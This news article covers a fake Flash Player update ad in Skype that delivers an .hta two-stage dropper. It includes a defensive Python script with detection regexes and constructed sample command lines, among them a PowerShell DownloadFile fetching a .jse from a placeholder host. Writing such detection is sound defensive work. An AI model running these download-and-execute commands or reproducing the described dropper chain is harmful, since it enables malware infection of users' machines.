Skype users exposed to malware through in-app ads

A fake Flash Player update ad on Skype | via reddit

A number of users are complaining that the popular communication application Skype has been hosting rogue advertisements, which carry a large risk of triggering malware.

The issue was raised on reddit last Wednesday, where the original poster complained that a malicious ad appeared while he was on Skype's home screen, and it was pretending to be a Flash update for the computer's browser.

As the redditor points out, the ad would prompt the user to download an HTML application named "FlashPlayer.hta," designed to look like a legitimate program. However, once opened, it would download a malicious payload, which could potentially harm a computer in the long run.

The poster has successfully deconstructed the code, and has posted it publicly on reddit.

In an investigation by ZDNet, the experts they contacted found the following regarding rogue Skype ads:

The "fake Flash" ad, designed to target Windows machines, pushed a download, which when opened would trigger obfuscated JavaScript. The code starts a new command line, then deletes the application that the user just opened, and runs a PowerShell command, which then downloads a JavaScript Encoded Script (JSE) from a domain that no longer exists, likely one of many disposable domains used to hide an attacker's operations.

According to Ali-Reza Anghaie, co-founder of cybersecurity firm Phobos Group, the issue is what is called a "two-stage dropper". "It's effectively the utility component of the malware that then decides what else to do based on the command and control it connects to," he shared.

While the domain used by the attacker no longer exists, Anghaie believes that it very likely serves ransomware.
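The chain described above (an .hta is opened, a command line deletes it, and PowerShell fetches a .jse) can be hunted for in process-creation telemetry. The following is an added example, not code from the article or the reddit post; it assumes events with host, PID, parent PID, image and command-line fields (such as Sysmon process-creation logging provides) and that the .hta runs under Windows' mshta.exe host. All sample events, paths and the example.invalid URLs are constructed.

```python
import re

# Patterns for the behaviours named in the article: a download and deletion of the .hta.
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|net\.webclient|\biwr\b", re.I)
DELETE_HTA = re.compile(r"\b(del|erase|remove-item)\b[^&|]*\.hta\b", re.I)
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed process-creation events (simplified fields; hosts, PIDs, paths and URLs are made up).
EVENTS = [
    {"host": "pc1", "pid": 100, "ppid": 50, "image": "mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\a\Downloads\FlashPlayer.hta"'},
    {"host": "pc1", "pid": 101, "ppid": 100, "image": "cmd.exe",
     "cmdline": r'cmd.exe /c del "C:\Users\a\Downloads\FlashPlayer.hta"'},
    {"host": "pc1", "pid": 102, "ppid": 101, "image": "powershell.exe",
     "cmdline": "powershell.exe -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/x.jse','x.jse')"},
    {"host": "pc2", "pid": 200, "ppid": 60, "image": "powershell.exe",  # benign: no mshta ancestor
     "cmdline": "powershell.exe Invoke-WebRequest https://example.invalid/tool.zip"},
]

def ancestors(event, by_pid):
    """Yield parent, grandparent, ... of an event on the same host."""
    seen = set()
    while (key := (event["host"], event["ppid"])) in by_pid and key not in seen:
        seen.add(key)
        event = by_pid[key]
        yield event

def find_hta_droppers(events):
    """Group suspicious shells under the mshta.exe process they descend from."""
    by_pid = {(e["host"], e["pid"]): e for e in events}
    findings = {}
    for e in events:
        if e["image"].lower() not in SHELLS:
            continue
        root = next((a for a in ancestors(e, by_pid) if a["image"].lower() == "mshta.exe"), None)
        if root is None:
            continue
        f = findings.setdefault((root["host"], root["pid"]), {"hta": root["cmdline"], "signals": set()})
        f["signals"].add("shell_from_mshta")
        if DELETE_HTA.search(e["cmdline"]):
            f["signals"].add("hta_self_delete")
        if DOWNLOAD.search(e["cmdline"]):
            f["signals"].add("download")
        if ".jse" in e["cmdline"].lower():
            f["signals"].add("jse_stage_two")
    return findings

if __name__ == "__main__":
    for key, f in find_hta_droppers(EVENTS).items():
        print(key, f["hta"], sorted(f["signals"]))
```

Keying on the mshta.exe ancestor rather than on PowerShell downloads alone keeps ordinary administrative downloads, like the pc2 event, out of the results.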

Other people have complained about malicious ads inside Skype, with the fake Flash update as a common denominator.

Wow not bad, got this in @Skype today, even had the download popup! pic.twitter.com/wyQXavBINm

— caseyfoster (@caseylynnfoster) March 30, 2017

Responding to the issue, a Microsoft spokesperson said that the issue was a "social-engineering effort," and that they should not be held responsible for the malicious content. The company further explains:

We're aware of a social engineering technique that could be used to direct some customers to a malicious website. We continue to encourage customers to exercise caution when opening unsolicited attachments and links from both known and unknown sources and install and regularly update antivirus software.

As stated, it pays to be careful when opening suspicious content from the internet. Much of it is designed to deceive users and steal sensitive information, aside from malware's usual work of wreaking havoc on our computers.

Source: reddit, ZDNet
